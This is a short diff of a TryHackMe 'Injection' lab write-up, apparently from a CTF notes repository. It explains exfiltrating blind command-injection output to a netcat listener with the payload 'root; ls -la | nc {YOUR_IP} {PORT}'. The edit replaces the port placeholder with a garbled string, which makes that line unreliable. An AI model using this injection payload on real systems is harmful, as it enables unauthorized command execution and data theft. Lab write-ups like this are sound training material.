bibo318/Writeup-CTF/Lab TryHackMe/Easy/Injection.md

 ## Bypassing the Blind Injection with Netcat

 In the spirit of full disclosure, there is a way to bypass the blind injection with netcat.
 You are able to pipe the output of a command to a nc listener.
-You could do something like ```root; ls -la | nc {YOUR_IP} {PORT}``` .
+You could do something like ```root; ls -la | nc {YOUR_IP} {PORT12**123:))}``` .
 This will send the output of ls -la to your netcat listener.

 ## Action
 1. Ping the box with 10 packets.
 What is this command (without IP address)?